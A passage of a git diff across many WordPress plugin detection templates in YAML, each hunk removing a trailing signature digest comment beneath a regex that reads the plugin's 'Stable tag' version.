4b0a00483046022100dd005680cd42df12b6c72f63d330bbdc6a26f63822382b352df913464caf53e202210085c19d21190e32664920e3fc0ca9fe419e9f40d0bbc6d0b03b6ed8de62e9d294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 1f981cc4c8..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cb9f1bf8be4948c93a575a151b5400844ec16dea1660c19526a376dc8048027e02206a37e2100df90bb0bc02a523e3726c865eee24148ae9f495a8554de43bedc6af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 0ff456436a..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203b7713f82feef41e441548ded3b1de5e7a2e0be604a89a6f25296f1b45f38a24022100cbc7216cb44b015e3f2e437eca310a9dc6ff9969c938a0ee77236f821066a177:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 9282fe08af..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210083c86975b865dc4064346398c9badd7453379c90eacf1e75a80b04843afde105022100ac36693591626c21dade086c6504ae8a7f2569cdb6a280bb0237cccef029310b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index e9a9cf9abc..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220404a3e08934dee9dd44a5b858d98212c32c0607d54263ba57d1a5c9e38d40603022100fe036551dc671a6dc0db9de7d455e127c2a5f8f0f1d17b29a04bd78acca5f95c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index b886b12f1b..59a655c424 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cdff53617aa5526bc90e4cd983455e4e045cd3624b4ce0eb1d14bcdaa8b5665f022028f53847046f791de1f75642d78332496fed70e677502f24f6fee6e5c653745d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 6ac4f817e7..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e0edf66b134cdf136f11ae28a1e40e78074ae50255db9f6a46376c14876619f9022100f37f512f70a3944173db3f172334ff79a4ec175744da95b5984ccbfb6cb67682:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index c4b3d7e66d..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220513774fe614438da1a0ddf1fd232a4b03c8654bae2a74180cd534b76fe68dc2902207f44251d19aff86aaa22971c747c6a705fce436bd79752b041c7ebbf03159ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index ac5aeff506..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206ca3871ed2a67b865004adfdc8e09d434599756cf4bfb9f422124283ad32cb0d022100c4106aa33ad9dd441c99b900767a4f08bd5e4387c0f4c639f6f929d17590ae12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index ab7020a229..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205931f78e5df15291a1a40a66a1baa9573e87d46b568aea1d3f5467e3de5bb9ba0221009d1539b80e8d87f7f08434d142a0b94d952bb88a8c866cf618f12625c65ad120:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 14090ec9ab..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009c283bb6adc9f31392be325580797424331246b9caa8d67c7902e1ac4cede044022100eddedd991398fa7fa788e0daf0edddfe9e15163ee4031d2deeb41d605b08395e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 8f9ab7c09b..0af08f0ac0 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e1a413712f73acc38ae62a45bb9d11d07d2d44060fdd0cff9fd5ea7a2053d01b022100a82002297d529bb08a7a5dec0b7724f8b6218d8815abadfdba7fce4a17056df7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 49c6b755df..1e4c77fbca 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207a48f80f5aae326a737c927d7f8dde8439c04303b0955206cea29e04474093940220516247faf3e6efe7ee8ff80a7bb7ca67997864670596a2d8d22c0e25f10f727d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 5c88c05a15..295e3fe82d 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022051f45470d4b994b9cffa8dfad3dca2a672406abafbe99c12e4455e4240e50131022100983f2c101139a688477954b5f795e72a7f2f5182494de4bea8fdbe289cb8ac0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 0c3b6871a6..862f73201f 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b8e97b120564b0d03a7515cf705afc81067cfd60010b320dee1a821582187fc6022034fe05db650bff9afb095a8ba7b10de84606a8b9edb12fe6ab6ec982d80f672c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index b0071c643b..711b64f9d0 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207f856450876c1be4524a4267715ffb9f671bfe34ff0e72ed62ac81ee86761b5502205baab5059419d05b06f9e3f2069a3b254b26759f4e873f5752e414895c7ddd1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index c7ba27ede2..58ddcfab78 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bdd6ae323f771126a52918821cf3cc655e056e3ffbe7b4ee9a65f763572ddb9802202e0fbd9aea30c9906b83ac60a265ee07d11b3009efda2f6a43cb87305852dfa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a320dd43bd..305d74e8ea 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204b7bc42e63bcbdff7cc7bd7dba639591073012bcab54bd73f6f141b4613dddb2022100a2a901b9d5f42551ffed1790b7f7ce075366e7fb59df441bedf104404c3b83a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index f0fcc8be22..668162fc4e 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203ad47ed4dfb36ba96b80351f5518043664c78eb2105988029d38a3dc811b2fc802205b6e74beaf2eae5e389a93bc18705d8915b9657a1b1f68a593eb5973b0a8fe3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index b1187383f3..4f99876557 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f0d60c084d61fc1784cd0aeab8903ed594a68116df6d84ec3825acd1df2cb17a02206ab48a14c849ccab56f9cffd97baf38ac0cd483a7b8ba7f8c9ca7b49b5354ba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index b91ddafd8a..a0d2554492 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d07ce80dd6c39ec355f2c341b94f10c4a6596bf0bfcb6eea7bef60a4246426a0022100e9bc46ad5eb2808300d14962115ad296baaeb8c326a7cfc3577c8dc2820d7260:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index aed0078e88..97b7306b75 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022053bc6430b79017b69514ebe0a62a61d4b810e11cdc149d626c110b0a79fef8ed022017a30f0035c8fe53c668049e17e0b9f3c074c01c9012bfd6937cdbd7321f2e48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index 29a13ac406..f44cee7980 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210085779038d85c961f1f515f6a6d9ae46290a02ea5f1db71e36be4fda05a901b8202203d7b39952fa7ac206b2fae0d679bbaa5e9910afd8736db5f1224a83c14ba08c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index df9f1b6e31..39130db767 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ebe9d32f7963de805a9574cfcc9bd6f093cce3e4648c728d44a5a1b943148de402201f55e6496a5dfee35ce49510b9272c094097ee980eb7a996f6ef32032925b7a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 13625b21ee..39c497073c 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a3c8be9eed71c6fd70506ff56f6df4b9176c7bc41751e99136471e065fba0585022100ca7c4f8c85336262eee7e41434589990783259070d60d8e8d9231cec389a0ded:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index bb5b49c350..b848288b55 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100aed447dbaba4dab56ec68a592f965993d29636e009cacbda0ff25ccff11287d1022100b9f2550b6ab9a216d76b4807374257a555dbe5d82dc2948e74db056c3afd0ddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 1bb56a1735..4d10178692 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022059d50aeb704c97254099755af19216ee2a8df3b4ab361befbe6eceeb55b0ca8e0221009ad8fb437176840a474ecd27675f0378c66dafb552e05298a30f00c53511309c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7d286359de..7aac0a153f 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207140d559920dac35ffeb93ea989b421868fc37f9ea61995b94062370c48b390502210096ff728fae0d0e5b7110d9ca1c50c606a7f97899bcbf1bf0a385c6f185a5b730:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 16eb659e32..d0cebd5316 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205a82ddebf9dd2c72897c0932cfbdddba926cc2b67f6dbd1602e54a09859d08ba022028cc28999a0884b19790c8f6d3c4ec8c50f5cb49ce470ede25e0286edc10e2b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index cd44590429..ff20779157 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220464ecd1f1ab445d15e0c71b464c772cdccfe175c981ee6c6a2a2689d7d9c2d390221008190bc394fb79b775b836d91b9cb1ae0259222d7c15ee425e8a8bc74975b18ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 8dd7a83de5..fffdc7d017 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eb037210d39b82095d8199f3680f3ad1520d7005066026945d02d2ad4b33bcce022100ce11ae65772855d295b35625c27974db06208b2160c4e257476718352c49abce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7759c2ae17..7a9746a70d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220225c20dcb55e389db51d4b87cfa905aaea766ed59b30470d0614075a5742919b022100af257761e92fb8d5888922f756c1789ccbc0563aae1b78260877c309288f035e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ff1aa86f90..3fe86debf5 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008fcc7060507841eec1f156c1eb72f4090c57e9af3dd290ddedc1a32bb2c90ceb0221008b652d2bfcd6067999cf7ec1fc484f2579e0da1134efde6b080c774c17bb961f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 6f42a03434..18a7437e94 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202635747f7e9fa1748d890c1617386c3d0ede09582969a6a6e41c42b0bd4813ec022035a4904da0a326ed56766a21191863eb2cf08c3e90aa6b1df4e102d22f6610a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index bc85650769..3deac58709 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220635ffa156ce9c553ab286fa8687b68a2486d540d7c80a6450949efb415748a5a022100b7bec3260aae6916c7d74a3fe3dfbc6e6d9a417ac878108b70754e133a54bc46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 3ca2fc44f5..b6f392efba 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220348dd68eb2a26eabc28a548cab79031fd17fe7d3369d8263c5548cf417d6126c0221008097b9b7f116e0f2527ba528e136188256add0933365811f7ce00c6d36707e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 97681aba2a..ad4ebefa4b 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022047f19cc9a459eef0f1b7b481cc5ceed0c5c516dfafb09315cb8931dfd8a60d74022100953fc8e03172f4429182fe7a6c7fbfccf43c9e319de957da68ae1bd1be68bde9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index b8724712fb..8e88c81c0a 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205daafad6c64279442c064c03f6cab5be2ef8c7b42bf1369bc242734019fb5b4f022068ea0cc27be9fc6eaca6a7520b1eb6da396ce68b2bddbf277021e57c76893890:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index cbc37a6e25..39d269fb85 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205baaa9ff59f7d7e6844a7d2f221858a3720bcefc322bf238989ce60ecf3b5b7b022100bb4df5dbfeca048d84a7eb22db797069ecfe1c670bc816f76bbc9a8c67b49bd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index d03226a448..fc126d83c6 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220061c260f93dbcd6aca3325dd20e65db1eb610c6d5ef3462e518338644927507c022100f33c03ec7cc1d2f740e5b227cc12bfce9be80504d56f8cfd62f2532440d7569d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 5b5b6d9598..8c49a34259 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205f53321f471e5d63588f4cfd6a91abdd082cb9b31b473c4704666bd350e6c1d5022100c8b3e1a79a6f1d9fc098586eb87e79be59d6eee342e41cec6b98a377ff2a6ff7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 4b3175b79c..c20ed6552a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022056aed7e67066343c993371853554eb311bd69a9a41920e8dce1d92d108f28e7802202541da3514c769c5337dc8f7898227e2cbe4cf9ebea0ff05d863c15d7aa81c2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 68fd91bf17..71c71b5ed1 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b0de502a1b3bd023ef9125a7e236415508a32c4eb2f306e41781cad40b5f666502207fd7d8636eb8e4e131a763599c5be2cab339342bcbfc1338837032282ce0d09e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index ebb76be279..7b47adc274 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210084b825a94510cc9cfc0e9d6351c08458865c806af4826978a60a46d4961d259b022100894d57cf13ddee3e42f28975cba8252b86fb84e5404d761ff16731f9fd07a82d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index d398eaa920..286dfdaec6 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022050a1120965c88a41381c00d9ce64a439a61c8c3ff71a1200b569e82c7867763302207e709dcfd43f00e0a2ad5794dd510160c10db388a61ed0683eaa4c2cba4c2507:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 4c7ff88f29..c4928059f6 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cb490368fdc75d6ba06ea0a70c47259cc8086bbab61685d44d33ba7dd27c102902206327b7bc614e8ab46d56d9920b89383d9c2c97f9122ae4f7e49528d3e39eb2b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index ef30de7cc0..f6a7836f35 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220301eeba94d75feae33553910d5600905edf6ae6c7806318c18850ad17629bdf6022100dec8d6ddd7bb78f288f47a5210375442a1de6e4279200b57249de5273a14bb31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index e12afd712a..b7af708c4f 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 